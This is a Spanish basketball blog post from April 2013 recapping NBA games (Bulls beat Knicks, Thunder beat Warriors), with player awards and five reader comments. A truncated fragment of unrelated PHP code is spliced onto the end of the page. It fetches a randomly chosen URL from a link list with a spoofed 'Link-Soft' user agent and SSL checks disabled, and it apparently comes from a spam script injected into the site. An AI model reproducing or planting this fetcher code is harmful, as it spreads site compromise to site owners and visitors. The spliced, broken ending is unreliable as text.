La Crónica: Equipo anti-rachas

12 de April de 2013 por txusma

Hace un par de semanas los Bulls finiquitaron la racha de 23 partidos de los Miami Heat. Ayer se cargaron la de los Knicks que iba ya por las 13 victorias y lo hicieron de una forma totalmente ilógica: a mediados del tercer cuarto perdían de 15 puntos de diferencia y no solo consiguieron remontar sinó que se pusieron 9 arriba, todo ello con las bajas de Rose, Noah y Gibson. Pero los Knicks lograron empatar y Melo aún tuvo la oportunidad de llevarse el partido. Se dice que en la prórroga suele ganar el equipo que la ha forzado pero como comentábamos, Chicago para jugar en una dimensión paralela. Los Knicks sólo anotaron 2 canastas y Nate Robison les apuntilló (111-118). Récord de anotación de la temporada para el pequeñín y nuevo partidazo de Jimmy Butler que aporta en todas las facetas del juego. Carmelo volvió a anotar 36 puntos, aunque con malos porcentajes, pero para compensar cogió 19 rebotes. La temporada de los Bulls sin Rose es digna de elogio y seguro que ningún equipo se los quiere encontrar en playoffs. Brookly e Indiana, sus posibles rivales, mal harían en confiarse lo más mínimo.

En el otro partido de la jornada, los Warriors plantaron cara a los Thunder durante toda la primera parte pero se hundieron en el tercer cuarto (116-97). Con esta victoria Oklahoma City se mantiene como líder de la conferencia Oeste. Kevin Durant jugó uno de esos partidos en los que todo parece fácil y además estuvo muy bien acompañado por Westbrook, Ibaka e incluso Kevin Martin. Por Golden State solo Curry y Jack respondieron mínimamente. 

PREMIOS


MVP:
No obviaremos la exhibición de Kevin Durant, autor de 31 puntos, 10 rebotes y 8 asistencias, pero hoy hay que destacar los 35 puntos de Nate Robinson y los 22 puntos, 14 rebotes, 3 robos y 3 tapones de Jimmy Butler.

Sorpresa: Partido bueno de Kevin Martin. 23 puntos con un 8 de 10 en tiro en 19 minutos. Si él se entona, los Thunder son todavía mucho más peligrosos.

Decepción: Mal día para Klay Thompson. El jugador de los Warriors se quedó en 6 puntos tras fallar 8 de sus 10 intentos de canasta.

Esfuerzo en vano: Esta vez Carmelo Anthony se va con las manos vacias a pesar de anotar 36 puntos y capturar 19 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Vader dice:
    #1

    En defensa de mis Knicks enumero las bajas que tenian para el partido: Stat, Tyson Chandler, R. Wallace, K. Martin y creo que tambien Camby… Vamos que el pivot titular era Copeland…

    Saludos

    P.D: Grandisima temporada de Nate Robinson, la mejor de su carrera.

      Citar

  2. GreenPride dice:
    #2

    Increible la temporada de los Bulls. Sin su claro mejor jugador (Rose) y con multitud de lesiones sobre todo de sus interiores y ahí están dando guerra y ganando partidos. Temporadón de CriptoNate, quién lo iba a decir. ¿Alguien sabe algo de los lesionados? Para mí sin Noah ni Gibson tienen poco que hacer y para ser aspirantes a algo deberían recuperar a Rose lo que ya veo complicado visto la altura de temporada en la que estamos.
    Lo mismo me vale para los Knicks, con Copeland de 5 titular pueden ir tirando en regular pero no en PO. Así que Chandler y Stat y hasta Martin son necesarios para poder competir de verdad en PO (no cuento con Sheed ni con Camby que ya están los dos muy pasados).
    En el Oeste los Thunder dejan claro que ellos van a por el primer puesto y a enfrentarse a los Lakers caso de que estos acaben clasificándose para PO. Mala noticia para los de LA en mi opinión que como ya he dicho creo que contra San Antonio tendrían opciones pero creo que contra OKC no las tendrán.

      Citar

  3. rumbero dice:
    #3

    GreenPride:
    ¿Alguien sabe algo de los lesionados? Para mí sin Noah ni Gibson tienen poco que hacer y para ser aspirantes a algo deberían recuperar a Rose lo que ya veo complicado visto la altura de temporada en la que estamos.

    KC Johnson del Chicago Tribune comenta que es probable que Gibson esté para los PO, incluso que pueda jugar minutos en la gira de 3 partidos fuera que tienen ahora. Noah está con la famosa fascitis plantar y sabiendo como va esto es seria duda para el inicio de PO, aunque conociendo al amigo tampoco me extrañaría que lo vieramos. Rose sigue sin fecha de retorno
    Si recuperan efectivos les veo plantando cara ya sea a Nets o Pacers, sino lo van a tener complicado a pesar de Robinson y sus postureos después enchufar triples. Crack!

      Citar

  4. Ruxixón dice:
    #4

    Jimy Butler es un jugadorazo

      Citar

  5. Jones dice:
    #5

    Si nos ponemos a enumerar las bajas de los Bulls, las de los Knicks son moco de pavo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>